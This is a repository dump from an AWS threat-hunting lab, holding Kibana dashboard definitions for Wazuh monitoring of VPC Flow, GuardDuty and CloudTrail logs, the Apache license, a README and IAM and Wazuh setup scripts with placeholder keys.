"{\"aggs\":[{\"enabled\":true,\"id\":\"1\",\"params\":{\"customBucket\":{\"enabled\":true,\"id\":\"1-bucket\",\"params\":{\"customInterval\":\"2h\",\"extended_bounds\":{},\"field\":\"@timestamp\",\"interval\":\"d\",\"min_doc_count\":1},\"schema\":{\"aggFilter\":[],\"deprecate\":false,\"editor\":false,\"group\":\"none\",\"max\":null,\"min\":0,\"name\":\"bucketAgg\",\"params\":[],\"title\":\"Bucket Agg\"},\"type\":\"date_histogram\"},\"customMetric\":{\"enabled\":true,\"id\":\"1-metric\",\"params\":{\"customLabel\":\"Bytes\",\"field\":\"data.aws.bytes\"},\"schema\":{\"aggFilter\":[\"!top_hits\",\"!percentiles\",\"!percentile_ranks\",\"!median\",\"!std_dev\",\"!sum_bucket\",\"!avg_bucket\",\"!min_bucket\",\"!max_bucket\",\"!derivative\",\"!moving_avg\",\"!serial_diff\",\"!cumulative_sum\"],\"deprecate\":false,\"editor\":false,\"group\":\"none\",\"max\":null,\"min\":0,\"name\":\"metricAgg\",\"params\":[],\"title\":\"Metric Agg\"},\"type\":\"sum\"}},\"schema\":\"metric\",\"type\":\"sum_bucket\"},{\"enabled\":true,\"id\":\"2\",\"params\":{\"customInterval\":\"2h\",\"extended_bounds\":{},\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1},\"schema\":\"segment\",\"type\":\"date_histogram\"}],\"params\":{\"addLegend\":true,\"addTimeMarker\":false,\"addTooltip\":false,\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"labels\":{\"show\":true,\"truncate\":100},\"position\":\"bottom\",\"scale\":{\"type\":\"linear\"},\"show\":true,\"style\":{},\"title\":{},\"type\":\"category\"}],\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"legendPosition\":\"right\",\"seriesParams\":[{\"data\":{\"id\":\"1\",\"label\":\"Overall Sum of Bytes\"},\"drawLinesBetweenPoints\":true,\"interpolate\":\"linear\",\"mode\":\"stacked\",\"show\":\"true\",\"showCircles\":true,\"type\":\"area\",\"valueAxis\":\"ValueAxis-1\"}],\"times\":[],\"type\":\"area\",\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"labels\":{\"filter\":false,\"rotate\":0,\"show\":true,\"truncate\":100},\"name\":\"LeftAxis-1\",\"position\":\"left\",\"scale\":{\"defaultYExtents\":false,\"mode\":\"normal\",\"setYExtents\":false,\"type\":\"linear\"},\"show\":true,\"style\":{},\"title\":{\"text\":\"Overall Sum of Bytes\"},\"type\":\"value\"}]},\"title\":\"VPCFlow-SumOfBytesOverTime-histogram\",\"type\":\"area\"}", 94 | "uiStateJSON": "{}", 95 | "description": "", 96 | "version": 1, 97 | "kibanaSavedObjectMeta": { 98 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"lucene\"}}" 99 | } 100 | } 101 | }, 102 | { 103 | "id": "cb77bf40-a541-11e8-846b-5b38848342c8", 104 | "type": "visualization", 105 | "attributes": { 106 | "title": "VPCFlow-Top10ExternalDestinationPort-Table", 107 | "visState": "{\"title\":\"VPCFlow-Top10ExternalDestinationPort-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showMeticsAtAllLevels\":false,\"showPartialRows\":false,\"showTotal\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstport\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Top 10 External Destination Port\"}}]}", 108 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 109 | "description": "", 110 | "version": 1, 111 | "kibanaSavedObjectMeta": { 112 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"language\":\"lucene\",\"query\":\"-data.aws.dstaddr: \\\"10.0.0.0/4\\\" OR -data.aws.dstaddr: \\\"172.16.0.0/12\\\" OR -data.aws.dstaddr: \\\"192.168.0.0/16\\\"\"}}" 113 | } 114 | } 115 | }, 116 | { 117 | "id": "70762330-a54f-11e8-846b-5b38848342c8", 118 | "type": "visualization", 119 | "attributes": { 120 | "title": "GuardDuty-MostCommonAccountID-Table", 121 | "visState": "{\"title\":\"GuardDuty-MostCommonAccountID-Table\",\"type\":\"table\",\"params\":{\"perPage\":5,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.accountId\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":5,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Account ID\"}}]}", 122 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 123 | "description": "", 124 | "version": 1, 125 | "kibanaSavedObjectMeta": { 126 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"kuery\"}}" 127 | } 128 | } 129 | }, 130 | { 131 | "id": "cf4ecc00-a54e-11e8-846b-5b38848342c8", 132 | "type": "visualization", 133 | "attributes": { 134 | "title": "GuardDuty-Last5Findings-Table", 135 | "visState": "{\"title\":\"GuardDuty-Last5Findings-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showMeticsAtAllLevels\":false,\"showPartialRows\":false,\"showTotal\":false,\"sort\":{\"columnIndex\":1,\"direction\":\"desc\"},\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"top_hits\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"aggregate\":\"concat\",\"size\":1,\"sortField\":\"@timestamp\",\"sortOrder\":\"desc\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.title\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"_term\",\"customLabel\":\"Last 5 GuardDuty Findings\"}}]}", 136 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":1,\"direction\":\"desc\"}}}}", 137 | "description": "", 138 | "version": 1, 139 | "kibanaSavedObjectMeta": { 140 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"language\":\"lucene\",\"query\":\"data.aws.source:guardduty\"}}" 141 | } 142 | } 143 | }, 144 | { 145 | "id": "47bf70b0-a552-11e8-846b-5b38848342c8", 146 | "type": "visualization", 147 | "attributes": { 148 | "title": "VPCFlow-TopTalkers-Pie", 149 | "visState": "{\"title\":\"VPCFlow-TopTalkers-Pie\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":false,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.interface_id\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"VPCFlow Top Talkers\"}}]}", 150 | "uiStateJSON": "{}", 151 | "description": "", 152 | "version": 1, 153 | "kibanaSavedObjectMeta": { 154 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.source : \\\"vpc\\\"\",\"language\":\"kuery\"}}" 155 | } 156 | } 157 | }, 158 | { 159 | "id": "864e9ef0-a4b7-11e8-846b-5b38848342c8", 160 | "type": "visualization", 161 | "attributes": { 162 | "title": "CloudTrail-EventNames-pie", 163 | "visState": "{\"title\":\"CloudTrail-EventNames-pie\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.eventName\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":5,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"CloudTrailEventNames\"}}]}", 164 | "uiStateJSON": "{}", 165 | "description": "", 166 | "version": 1, 167 | "kibanaSavedObjectMeta": { 168 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"language\":\"lucene\",\"query\":\"\"}}" 169 | } 170 | } 171 | }, 172 | { 173 | "id": "90d5fd80-a6fd-11e8-89d6-8101ba40c8df", 174 | "type": "visualization", 175 | "attributes": { 176 | "title": "GuardDuty-CountryOfOrigin-MAP", 177 | "visState": "{\"title\":\"GuardDuty-CountryOfOrigin-MAP\",\"type\":\"region_map\",\"params\":{\"legendPosition\":\"bottomright\",\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"selectedLayer\":{\"attribution\":\"

Made with NaturalEarth | Elastic Maps Service

\",\"name\":\"World Countries\",\"weight\":1,\"format\":{\"type\":\"geojson\"},\"url\":\"https://vector.maps.elastic.co/blob/5659313586569216?elastic_tile_service_tos=agree&my_app_version=6.3.2&license=3686161f-2f78-4c9f-aa49-6fb90996a3b3\",\"fields\":[{\"name\":\"iso2\",\"description\":\"Two letter abbreviation\"},{\"name\":\"name\",\"description\":\"Country name\"},{\"name\":\"iso3\",\"description\":\"Three letter abbreviation\"}],\"created_at\":\"2017-04-26T17:12:15.978370\",\"tags\":[],\"id\":5659313586569216,\"layerId\":\"elastic_maps_service.World Countries\"},\"selectedJoinField\":{\"name\":\"name\",\"description\":\"Country name\"},\"isDisplayWarning\":false,\"wms\":{\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"baseLayersAreLoaded\":{},\"tmsLayers\":[{\"id\":\"road_map\",\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.3.2&license=3686161f-2f78-4c9f-aa49-6fb90996a3b3\",\"minZoom\":0,\"maxZoom\":18,\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"subdomains\":[]}],\"selectedTmsLayer\":{\"id\":\"road_map\",\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.3.2&license=3686161f-2f78-4c9f-aa49-6fb90996a3b3\",\"minZoom\":0,\"maxZoom\":18,\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"subdomains\":[]}},\"mapZoom\":2,\"mapCenter\":[0,0],\"outlineWeight\":1,\"showAllShapes\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.service.action.portProbeAction.portProbeDetails.remoteIpDetails.country.countryName\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":100,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"CountryOfOrigin\"}}]}", 178 | "uiStateJSON": "{}", 179 | "description": "", 180 | "version": 1, 181 | "kibanaSavedObjectMeta": { 182 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"kuery\"}}" 183 | } 184 | } 185 | }, 186 | { 187 | "id": "b4f2abe0-a541-11e8-846b-5b38848342c8", 188 | "type": "visualization", 189 | "attributes": { 190 | "title": "VPCFlow-Top10InternalDestinationPort-Table", 191 | "visState": "{\"title\":\"VPCFlow-Top10InternalDestinationPort-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showMeticsAtAllLevels\":false,\"showPartialRows\":false,\"showTotal\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstport\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Top 10 Interal Destination Port\"}}]}", 192 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 193 | "description": "", 194 | "version": 1, 195 | "kibanaSavedObjectMeta": { 196 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"language\":\"lucene\",\"query\":\"data.aws.dstaddr: \\\"10.0.0.0/4\\\" OR data.aws.dstaddr: \\\"172.16.0.0/12\\\" OR data.aws.dstaddr: \\\"192.168.0.0/16\\\"\"}}" 197 | } 198 | } 199 | }, 200 | { 201 | "id": "b4666910-a54f-11e8-846b-5b38848342c8", 202 | "type": "visualization", 203 | "attributes": { 204 | "title": "GuardDuty-MostCommonInstanceID-Table", 205 | "visState": "{\"title\":\"GuardDuty-MostCommonInstanceID-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.resource.instanceDetails.instanceId\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Instance ID\"}}]}", 206 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 207 | "description": "", 208 | "version": 1, 209 | "kibanaSavedObjectMeta": { 210 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"kuery\"}}" 211 | } 212 | } 213 | }, 214 | { 215 | "id": "c71b00a0-a709-11e8-89d6-8101ba40c8df", 216 | "type": "visualization", 217 | "attributes": { 218 | "title": "loggingSourcesFor-58.218.205.75", 219 | "visState": "{\"title\":\"loggingSourcesFor-58.218.205.75\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.source\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":5,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"AWS Logging Sources\"}}]}", 220 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 221 | "description": "", 222 | "version": 1, 223 | "kibanaSavedObjectMeta": { 224 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"58.218.205.75\",\"language\":\"kuery\"}}" 225 | } 226 | } 227 | } 228 | ] 229 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AWS Detonation Lab 2 | 3 | These scripts can be used as proof-of-concept to generate a detonation lab via a cloudformation template. There are also scripts for adding wazuh agents to the target systems as well as scripts to generate attacks on them that will be seen by AWS logging systems such as GuardDuty, VPC flow, Route53 DNS, Macie, CloudTrail, and other systems. 4 | 5 | All of these logs can be configured to send to the Kibana instance running on the Wazuh server for usage in threat hunting and incident investigation and response. 6 | 7 | This cloudformation template and guard duty alert generation scripts are based on the [GuardDuty-Tester.template](https://github.com/awslabs/amazon-guardduty-tester/blob/master/guardduty-tester.template) uses AWS CloudFormation to create an isolated environment with a bastion host, a redTeam EC2 instance that you can ssh into, and two target EC2 instances. 8 | 9 | Then you can run [guardduty_tester.sh](https://github.com/awslabs/amazon-guardduty-tester/blob/master/guardduty_tester.sh) that starts interaction between the redTeam EC2 instance and the target Windows EC2 instance and the target Linux EC2 instance to simulate five types of common attacks that GuardDuty is built to detect and notify you about with generated findings. 10 | 11 | For more information please refer to the [wiki](https://github.com/sonofagl1tch/AWSDetonationLab/wiki) 12 | 13 | ## Thank you for your contributions 14 | 15 | Special thanks to [Marta](https://github.com/mgmacias95) and [Danny](https://github.com/randoh) for their contributions to this project. 16 | 17 | ## Video presentations using this project 18 | 19 | [Who Done It: Gaining Visibility and Accountability in the Cloud](https://youtu.be/x4OJx2M52iI) - SANS Threat Hunting Summit 2018 20 | -------------------------------------------------------------------------------- /SANs_ThreatHuntingSummit-Powerpoint/Storm-Troopers-ThreatHuntingInTheClouds.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/SANs_ThreatHuntingSummit-Powerpoint/Storm-Troopers-ThreatHuntingInTheClouds.pdf -------------------------------------------------------------------------------- /ThreatHuntingGuides/README.md: -------------------------------------------------------------------------------- 1 | place holder 2 | -------------------------------------------------------------------------------- /Wazuh-configurations/runOnAWSCLIHost/awsCLI-wazuh-configuration-cloudTrail.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #These are the changes required to the wazuh server configuration to allow for the ingestion of cloudTrail logs 3 | # this script assumes that you already setup cloudTrail and are sending logs to the s3 bucket "aws-detonatonlab-1234567890" 4 | # https://documentation.wazuh.com/current/amazon/installation.html#create-an-iam-user 5 | 6 | #https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_create.html 7 | #policy name: Access-s3-cloudTrail-wazuh 8 | cat < Access-s3-cloudTrail-wazuh.json 9 | { 10 | "Version": "2012-10-17", 11 | "Statement": [ 12 | { 13 | "Sid": "VisualEditor0", 14 | "Effect": "Allow", 15 | "Action": [ 16 | "s3:GetObject", 17 | "s3:ListBucket", 18 | "s3:DeleteObject" 19 | ], 20 | "Resource": [ 21 | "arn:aws:s3:::aws-detonatonlab-1234567890", 22 | "arn:aws:s3:::aws-detonatonlab-1234567890/*" 23 | ] 24 | } 25 | ] 26 | } 27 | EOF 28 | #create wazuh access policy to cloudTrail 29 | ##https://docs.aws.amazon.com/cli/latest/reference/iam/create-policy.html 30 | aws iam create-policy --policy-name Access-s3-cloudTrail-wazuh --policy-document Access-s3-cloudTrail-wazuh.json 31 | 32 | 33 | #Create an IAM User 34 | #user name: wazuh-user 35 | aws iam create-user --user-name wazuh-user 36 | aws iam create-access-key --user-name wazuh-user 37 | 38 | #attach policy to user 39 | aws iam attach-user-policy --policy-arn arn:aws:iam::1234567890:policy/wazuh-read-cloudTrail --user-name wazuh-user -------------------------------------------------------------------------------- /Wazuh-configurations/runOnWazuh/server-wazuh-configuration-cloudTrail.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #https://documentation.wazuh.com/current/amazon/installation.html#create-an-iam-user 3 | 4 | #variables 5 | insert_access_key="1234567890" 6 | insert_secret_key="0987654321" 7 | #Installing dependencies 8 | #Pip 9 | yum install python-pip 10 | #Boto3 11 | pip install boto3 12 | 13 | #Plugin configuration 14 | #backup plugin config file 15 | cp /var/ossec/etc/ossec.conf /var/ossec/etc/ossec.conf.bk 16 | #overwrite old config file with new config 17 | cat < /var/ossec/etc/ossec.conf 18 | 23 | 24 | 25 | 26 | yes 27 | yes 28 | no 29 | no 30 | no 31 | smtp.example.wazuh.com 32 | ossecm@example.wazuh.com 33 | recipient@example.wazuh.com 34 | 12 35 | 131072 36 | 37 | 38 | 39 | 3 40 | 12 41 | 42 | 43 | 44 | 45 | plain 46 | 47 | 48 | 49 | secure 50 | 1514 51 | udp 52 | 131072 53 | 54 | 55 | 56 | 57 | no 58 | yes 59 | 